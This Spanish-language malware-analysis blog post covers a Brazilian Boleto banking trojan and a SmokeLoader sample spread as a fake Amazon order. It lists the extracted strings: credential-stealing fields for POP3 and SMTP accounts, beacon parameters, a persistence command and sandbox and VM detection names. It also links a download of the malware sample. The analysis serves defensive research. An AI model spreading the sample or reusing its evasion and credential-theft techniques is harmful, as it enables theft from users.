<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 00489E20 <ansistring> 'codbar'</ansistring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 00489E30 <ansistring> '987'</ansistring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 00489E3C <ansistring> 'CodigoBarra'</ansistring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 00489E50 <ansistring> 'op=bolas'</ansistring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 00489E64 <ansistring> 'log='</ansistring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 00489E74 <ansistring> 'sen='</ansistring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 00489E84 <ansistring> ' 30/07'</ansistring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 00489E94 <ansistring> 'vlr='</ansistring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 00489EA4 <ansistring> 'dts='</ansistring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 00489EB0 <widestring> 'sit=\07??'</widestring></span></div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Codigo Javascript</span></b></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLLJI8614i9ircDcs1q9TU2cgzSFmbvw-UgXyrLnne91p_NsJay2G6Wib3RTT-jIY959xKzBLagcaLitCgz-YC0Koxcmts69o1iQ6JJwsXlseDnVfYWCwQSPqOXWC9QoEQTouBiTLseEU/s1600/boletos.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLLJI8614i9ircDcs1q9TU2cgzSFmbvw-UgXyrLnne91p_NsJay2G6Wib3RTT-jIY959xKzBLagcaLitCgz-YC0Koxcmts69o1iQ6JJwsXlseDnVfYWCwQSPqOXWC9QoEQTouBiTLseEU/s1600/boletos.jpg" height="516" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Este troyano estaría relacionado con el robo de Boletos, que es un método de pago muy popular en Brasil.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Pueden leer la nota sobre este tema en el blog de <a href="http://blog.kaspersky.es/boletos-lo-que-podemos-aprender/">Kaspersky</a></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
<span style="background-color: white; color: #535353; font-size: 14px; line-height: 23.799999237060547px; text-align: start;"><span style="font-family: Arial, Helvetica, sans-serif;">El truco no es complicado, explicó Bestúzhev. Mientras un usuario está imprimiendo su Boleto, un troyano en el ordenador de la víctima modifica el código de barras del Boleto. Entonces, el Boleto impreso es inservible. El criminal utiliza después el código de barras legítimo del Boleto para transferir dinero a su propia cuenta.</span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;"><b>6.txt </b> (es un cpl que es cargado en memoria por el downloader)</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;">Analisis en V.T. </span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6OpRTcOUTqFHqpMmosPxWBXrGFj4MaGpK2TdZYzxkMaB068oVa8rumCUEBwhGh_ncUj4p82vSRX1gjsTEtVCTIFAr6Wa0AbTc8nt0F3zeiSq9-zAW3-TfgeOmUOvfLcxiz7Ma41uG_oE/s1600/vt4.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6OpRTcOUTqFHqpMmosPxWBXrGFj4MaGpK2TdZYzxkMaB068oVa8rumCUEBwhGh_ncUj4p82vSRX1gjsTEtVCTIFAr6Wa0AbTc8nt0F3zeiSq9-zAW3-TfgeOmUOvfLcxiz7Ma41uG_oE/s1600/vt4.jpg" height="180" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<span style="font-family: Arial, Helvetica, sans-serif;">Strings:</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0047FFB0 <ansistring> 'op=fc'</ansistring></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0047FFC0 <ansistring> 'log='</ansistring></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0047F3CC <ansistring> 'L-O-O-K'</ansistring></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0047FD58 <ansistring> 'Documents and Settings'</ansistring></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0047FD78 <ansistring> '\\Desk'</ansistring></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0047FD88 <ansistring> 'u8v7DgLUz2nC'</ansistring></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0047FDA0 <ansistring> 'xeq'</ansistring></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0047FDAC <ansistring> 'xerHzg6ZigrLigfWBgLJyxrPDM6Zxa'</ansistring></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0047FDD4 <ansistring> 'vxnLCNnC'</ansistring></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0047FDE8 <ansistring> '\\AppData\\Roaming\\'</ansistring></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0047FE04 <ansistring> 'i'</ansistring></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0047FE10 <ansistring> 'Password:'</ansistring></span><br />
<span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;"> 0047FE3C <ansistring> 'Fimsmtp'</ansistring></span><br />
<span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;"> 0047FE78 <ansistring> 'id.sys'</ansistring></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0047FE88 <ansistring> 'al'</ansistring></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0047FE94 <ansistring> 'Ahr7CdOV</ansistring></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0047C114 <ansistring> 'dbx'</ansistring></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0047C120 <ansistring> 'wab'</ansistring></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0047C408 <ansistring> '*.dbx'</ansistring></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0047C418 <ansistring> 'C:\\'</ansistring></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0047C424 <ansistring> 'dbx'</ansistring></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0047C430 <ansistring> '*.wab'</ansistring></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0047C440 <ansistring> 'wab'</ansistring></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0047C44C <ansistring> '*.mbx'</ansistring></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0047C45C <ansistring> 'mbx'</ansistring></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0047C468 <ansistring> '*.mai'</ansistring></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0047C478 <ansistring> 'mai'</ansistring></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0047C484 <ansistring> '*.eml'</ansistring></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0047C494 <ansistring> 'eml'</ansistring></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0047C4A0 <ansistring> '*.tbb'</ansistring></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0047C4B0 <ansistring> 'c:\\'</ansistring></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0047C4BC <ansistring> 'tbb'</ansistring></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0047C4C8 <ansistring> '*.mbox'</ansistring></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0047C4D8 <ansistring> 'mbox'</ansistring></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0047C9BC <ansistring> 'ps'</ansistring></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0047C9C8 <ansistring> 'to'</ansistring></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0047C9D4 <ansistring> 're'</ansistring></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0047C9E0 <ansistring> 'c.'</ansistring></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0047C9EC <ansistring> 'dl'</ansistring></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0047C9F8 <ansistring> 'l'</ansistring></span><br />
<br />
<br />
<b><span style="font-family: Arial, Helvetica, sans-serif;">Decodifican como:</span></b><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> \Software\Microsoft\Internet Account Manager\Accounts</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Identi</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Account Name</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Account Name</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Nome .....: </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SMTP Display Name</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Login .....: </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">POP3 User Name</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Senha .....: </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">POP3 .....: </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">POP3 Server</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SMTP .....: </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SMTP Server</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Nome .....: </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">2l3oþ%HROM€˜þ-‚ŽD</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Login .....: </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">POP3 User Name</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Senha .....: </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">POP3 .....: </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">POP3 Server</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SMTP .....: </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SMTP Server</span><br />
<br />
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Este modulo se encarga de robar datos de POP3, IMAP</span></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnoz3lfcSRvlTlbYXYOCr88rbfL5o9pBKjMZ5L6k4uSWbjwT9atgAiSO_2tQgpPDUwR7-O0XwbulECH0GUVDZ8eEWtqt16L-nJJClx3UEcMXfvpzmwncCreJVbQJIg6nJsDsi06zEk0HY/s1600/mail-b.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnoz3lfcSRvlTlbYXYOCr88rbfL5o9pBKjMZ5L6k4uSWbjwT9atgAiSO_2tQgpPDUwR7-O0XwbulECH0GUVDZ8eEWtqt16L-nJJClx3UEcMXfvpzmwncCreJVbQJIg6nJsDsi06zEk0HY/s1600/mail-b.jpg" height="640" width="432" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWi4EWrhdaXknW2dzu4KcAF64RQ6_wllOPt0VAx2sxyeub_sRZcDZq_6wrUJpzBb2MOjLTY_5G9u1k4hJfwTA9kNFY8D7D4OBax3aomfb22eFYSs5YMz2xTOJ8CUdnkPdkF0lkwL153_0/s1600/pop3-b.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWi4EWrhdaXknW2dzu4KcAF64RQ6_wllOPt0VAx2sxyeub_sRZcDZq_6wrUJpzBb2MOjLTY_5G9u1k4hJfwTA9kNFY8D7D4OBax3aomfb22eFYSs5YMz2xTOJ8CUdnkPdkF0lkwL153_0/s1600/pop3-b.jpg" height="640" width="400" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Muestra: https://www.dropbox.com/s/lter3agprah9pcl/banker-02-08-14.rar</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Eso es todo por el momento.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">@Dkavalanche 2014</span></div>
@Dkavalanchehttp://www.blogger.com/profile/05803700040566483414noreply@blogger.com0tag:blogger.com,1999:blog-4220472203730425546.post-14839782280492693612014-07-18T12:05:00.000-07:002014-07-18T12:25:02.190-07:00<b><span style="font-family: Arial, Helvetica, sans-serif;">SmokeLoader</span></b><br />
<br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">Gracias a mi amigo <a href="http://%E2%80%8F@rfb_/">Raul</a>, hoy les traigo esta muestra de SmokeLoader que es distribuida como un falsa orden de compras de Amazon.com</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgT9bCnqm1tjXXPGCHjurFk8wufpc0ZOqEp1LqJiiSnN5mQWeh67Qe-U2NjlDvS5ZfwaQLrnVcRFCHzeW8pKgZ-VYlpyUgVWZJFltolrezSxoZbab9fvmxnMwkNCadpxomdVWKFcnty58Y/s1600/fake.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgT9bCnqm1tjXXPGCHjurFk8wufpc0ZOqEp1LqJiiSnN5mQWeh67Qe-U2NjlDvS5ZfwaQLrnVcRFCHzeW8pKgZ-VYlpyUgVWZJFltolrezSxoZbab9fvmxnMwkNCadpxomdVWKFcnty58Y/s1600/fake.jpg" height="290" width="320" /></a></div>
<br />
<br />
<br />
Analisis en V.T.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrWd4oDh2xcO2dXS2Xn94XOqHu7yi8_sLy6ng4KqSAKv4-4ONK6jJOC28Zn4y_-J311CmOSiF47Q6aQifX9WMZUdoGUWnAPuM17RZMBTACTSh_XEFAduYehRV1Ct9xIOYNrLMvqIfvz_g/s1600/vt1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrWd4oDh2xcO2dXS2Xn94XOqHu7yi8_sLy6ng4KqSAKv4-4ONK6jJOC28Zn4y_-J311CmOSiF47Q6aQifX9WMZUdoGUWnAPuM17RZMBTACTSh_XEFAduYehRV1Ct9xIOYNrLMvqIfvz_g/s1600/vt1.jpg" height="138" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Capa de un básico Cripter en Vbasic</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuPhbkC86PgyIaALHKyAoVRL6hVg1KnZUblCxSTsS4Pwd3MCFu8hdwKiLNtuOhi0iWFoWNtISBW3x-IHxnRWao52aOo53eTW1eIfdGlLyWN9bHEYvcgxe9MsIY3iAd9qFFu0IqelKNGiY/s1600/01.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuPhbkC86PgyIaALHKyAoVRL6hVg1KnZUblCxSTsS4Pwd3MCFu8hdwKiLNtuOhi0iWFoWNtISBW3x-IHxnRWao52aOo53eTW1eIfdGlLyWN9bHEYvcgxe9MsIY3iAd9qFFu0IqelKNGiY/s1600/01.png" height="203" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgs-b9JefKXi8JvG0pmZNLw5eyn5JUY7GdEsUO01s5Vfn2FsvwLwDqpBson170mxXzMFm4R7Cvnmw8zzhTVsucSgkjGXMBQYXmqJYG5YIdnIqMe8TEAVOhApqGYgdyuCWAlSDfnY3uPJtM/s1600/02.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgs-b9JefKXi8JvG0pmZNLw5eyn5JUY7GdEsUO01s5Vfn2FsvwLwDqpBson170mxXzMFm4R7Cvnmw8zzhTVsucSgkjGXMBQYXmqJYG5YIdnIqMe8TEAVOhApqGYgdyuCWAlSDfnY3uPJtM/s1600/02.png" height="209" width="320" /></a></div>
<br />
Sin Crypter,<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyM_ZpMjaXtPwzi2SH7SakjACD2uMuVxFyTXG32jtniAtjSOQcRxRdsxD3PULFUPFzzGBA_x1i9DXKR059qPsA4MA3-LC72wT3Mq3ytFHLSHAgmsccwxdd4keHFejr5w0KLCY-mkg8LnU/s1600/vt2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyM_ZpMjaXtPwzi2SH7SakjACD2uMuVxFyTXG32jtniAtjSOQcRxRdsxD3PULFUPFzzGBA_x1i9DXKR059qPsA4MA3-LC72wT3Mq3ytFHLSHAgmsccwxdd4keHFejr5w0KLCY-mkg8LnU/s1600/vt2.jpg" height="113" width="400" /></a></div>
<br />
<br />
Strings interesantes<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E126C ASCII "&file=",0</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E1274 ASCII "&run=ok",0</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E127C ASCII "&run=fail",0</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E1288 ASCII "&sel=",0</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E1290 ASCII "&ver=",0</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E1298 ASCII "&bits=",0</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E12A0 ASCII "&doubles=1",0</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E12AC ASCII "&personal=ok",0</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E12BC ASCII "&removed=ok",0</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E12C8 ASCII "&admin=",0</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E12D0 ASCII "&hash=",0</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E12D8 ASCII "&r=",0</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E12DC ASCII "Software",0</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E2798 ASCII "svchost.exe",0</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E2998 SUB EAX,Smoke.001E2740 ASCII "`è$"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E2AB6 PUSH Smoke.001E2E3C ASCII "Shell_TrayWnd"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E2C03 PUSH Smoke.001E2E4C ASCII "s2k14"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E2C69 PUSH Smoke.001E2E4C ASCII "s2k14"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E2D36 PUSH Smoke.001E2E54 ASCII "svchost.exe"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E2E86 PUSH 0x10000 UNICODE "=::=::\"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E35E2 PUSH Smoke.001E3A14 ASCII "System"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E38CC PUSH Smoke.001E3A1C ASCII "advapi32.dll"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E38DC PUSH Smoke.001E3A1C ASCII "advapi32.dll"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E39A8 PUSH Smoke.001E3A1C ASCII "advapi32.dll"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E3A14 ASCII "System",0</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E3A1C ASCII "advapi32.dll",0</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E3A5D MOV EDX,Smoke.001E3D90 ASCII "Location:"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E3D90 ASCII "Location:",0</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E3E1F MOV EDX,Smoke.001E424C ASCII "Smk"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E3E5E MOV EDX,Smoke.001E4250 ASCII "plugin_size"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E3E9C MOV EDX,Smoke.001E425C ASCII "|:|"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E3EED PUSH 0xFA000 UNICODE "september"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E3FBB PUSH Smoke.001E4260 ASCII "advapi32.dll"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E3FCB PUSH Smoke.001E4260 ASCII "advapi32.dll"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E4019 PUSH Smoke.001E4270 ASCII "%s%s%c"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E4084 PUSH Smoke.001E4278 ASCII "%s%s"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E4137 PUSH Smoke.001E4278 ASCII "%s%s"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E41C0 PUSH Smoke.001E4280 ASCII "%s%s%d"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E424C ASCII "Smk",0</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E4478 ASCII "%s%s%s%s%s",0</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E4586 MOV EDX,Smoke.001E45E4 ASCII "Work"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E45E4 ASCII "Work",0</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E464A PUSH 0xFA000 UNICODE "september"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E4792 PUSH Smoke.001E4858 ASCII "FF"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E479C PUSH Smoke.001E485C ASCII "%s%s"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E47E5 PUSH Smoke.001E4864 ASCII "%s%s%s"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E4858 ASCII "FF",0</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E485C ASCII "%s%s",0</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E4864 ASCII "%s%s%s",0</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E489F MOV EDX,Smoke.001E49E4 ASCII "sample"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E48CC PUSH Smoke.001E49EC ASCII "C:\"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E4919 PUSH Smoke.001E49F0 ASCII "System\CurrentControlSet\Services\Disk\Enum"</span><br />
<span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">001E5088 DD Smoke.001E1024 UNICODE "%s\%s"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E508C DD Smoke.001E1030 UNICODE "%s%s"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E5090 DD Smoke.001E103C UNICODE "regsvr32 /s %s"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E5094 DD Smoke.001E105C UNICODE "%s\%s.lnk"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E5098 DD Smoke.001E1070 UNICODE "%APPDATA%"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E509C DD Smoke.001E1084 UNICODE "%TEMP%"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E50A0 DD Smoke.001E1094 UNICODE ".exe"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E50A4 DD Smoke.001E10A0 UNICODE ".dll"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E50A8 DD Smoke.001E10AC UNICODE "/c start %s && exit"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E50AC DD Smoke.001E10D4 ASCII "user32"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E50B0 DD Smoke.001E10DC ASCII "shell32"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E50B4 DD Smoke.001E10E4 ASCII "advapi32"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E50B8 DD Smoke.001E10F0 ASCII "crypt32"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E50BC DD Smoke.001E10F8 ASCII "ws2_32"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E50C0 DD Smoke.001E1100 ASCII "urlmon"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E50C4 DD Smoke.001E1108 ASCII "ole32"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E50C8 DD Smoke.001E1110 ASCII "HelpLink"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E50CC DD Smoke.001E111C ASCII "URLInfoAbout"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E50D0 DD Smoke.001E112C ASCII "sbiedll"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E50D4 DD Smoke.001E1134 ASCII "dbghelp"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E50D8 DD Smoke.001E113C ASCII "qemu"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E50DC DD Smoke.001E1144 ASCII "virtual"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E50E0 DD Smoke.001E114C ASCII "vmware"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E50E4 DD Smoke.001E1154 ASCII "xen"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E50E8 DD Smoke.001E1158 ASCII ":Zone.Identifier"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E50EC DD Smoke.001E116C ASCII "Mozilla/4.0"</span><br />
